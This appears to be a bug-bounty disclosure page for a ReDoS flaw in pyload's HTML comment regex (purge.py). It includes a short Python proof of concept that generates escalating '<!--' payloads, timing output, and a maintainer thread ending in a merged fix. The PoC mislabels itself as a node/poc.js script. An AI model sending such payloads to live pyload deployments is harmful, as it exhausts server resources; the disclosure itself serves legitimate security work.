Inefficient Regular Expression Complexity in pyload/pyload

Valid

Reported on

Sep 20th 2021


✍️ Description

The pyload package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide crafted HTML comments as input to the comments function of utils/web/purge.py may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Reproducer where we’ve copied the relevant code:

https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L7 https://github.com/pyload/pyload/blob/127beb0ea3b9c9c23991cbde7d83dc9d892d2d5c/src/pyload/core/utils/web/purge.py#L12-L14

Put the below in a poc.js file and run with node

import time
import re
_RE_COMMENTS = re.compile(r"<!--.*?-->", flags=re.S)


def comments(value):
    """Removes HTML comments from a text string."""
    return _RE_COMMENTS.sub("", value).strip()

for i in range(1, 50000):
    start_time = time.perf_counter()
    payload = ""+"<!--"*(i*10000)+"-"
    comments(payload)
    stop_time = time.perf_counter() - start_time
    print("Payload.length: " + str(len(payload)) + ": " + str(stop_time) + " ms")

Check the Output:

Payload.length: 40001: 2.9121267 ms
Payload.length: 80001: 10.2797351 ms
Payload.length: 120001: 27.080219800000002 ms
Payload.length: 160001: 45.3576031 ms
Payload.length: 200001: 66.31825060000001 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 2 months ago
Ziding Zhang
2 months ago

Admin


Hey ready-research, I've emailed the maintainers for you.

We have contacted a member of the pyload team and are waiting to hear back 2 months ago
pyload/pyload maintainer
2 months ago

Maintainer


Hello, I got your email, How do you suggest to fix this issue?

ready-research submitted a
2 months ago
ready-research
2 months ago

Researcher


@maintainer Submitted a patch.

Please validate this issue using Mark as valid and also please confirm the fix once it got merged.

pyload/pyload maintainer validated this vulnerability 2 months ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
pyload/pyload maintainer
2 months ago

Maintainer


@ready-research Where is the patch?

ready-research
2 months ago

Researcher


You can select my branch fix-redos.

@admin Can you please guide the maintainer?

Jamie Slome
2 months ago

Admin


@mainainer - please click the confirm fix button above, and follow the steps in the modal form.

When selecting who fixed the vulnerability, feel free to elect @ready-research.

ready-research submitted a
2 months ago
pyload/pyload maintainer confirmed that a fix has been merged on 0ff11b 2 months ago
ready-research has been awarded the fix bounty
purge.py#L7 has been validated